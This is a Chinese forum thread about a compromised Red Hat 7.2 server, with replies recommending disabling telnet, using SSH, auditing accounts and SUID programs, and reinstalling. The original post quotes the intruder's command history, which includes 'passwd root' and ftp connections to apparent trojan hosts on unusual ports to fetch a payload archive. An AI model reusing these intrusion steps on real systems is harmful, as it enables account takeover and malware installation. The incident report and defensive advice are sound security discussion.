TELNET 到我的服务器， 输入用户名/密码，顺利，su/密码，坏了，我没有输对，再来一遍，糟糕，密码改了，没有人知道我的密码呀，随后到了单位（服务器在单位），启用单用户模式，算是改了，同时看到/etc下的很多链接好象没了，都变成闪烁的了，也看到他使用了一些命令： 
passwd root 
clear 
cd /dev/rd/a/ft 
ping 
clear 
ping www.yahoo.com 
clear 
ftp ftp.mogodan.org 
ftp terra2.net 6666 
ftp terra2.net 666 
clear 
并且他上传了一个文件叫：aw.tgz 

我也不知道是什么？看来安全问题不得不重视了，但是知道的太少了，另外LINUX（REDHAT 7.2）就这么不堪一击？

mogodan是一个木马程序

不过他没有造成什么伤害

建议对所有的账号进行审核

你不应该打开telnet服务端口，用ssl一类的加密方法吧

就算一定要打开，最好不要用常用的23端口

先找找所有suid的程序，可能已经留了后门

安全起见，建议重装系统，然后把不是必须的服务都去掉，密码需要设置的长一点。象telnet, ftp, email等最好都不要开，非要远程管理，那就用ssh，而且一定要下载最新版本，最好经常注意版本，打好补丁。一般来说，安全的程度就可以把一般的菜鸟防在外面了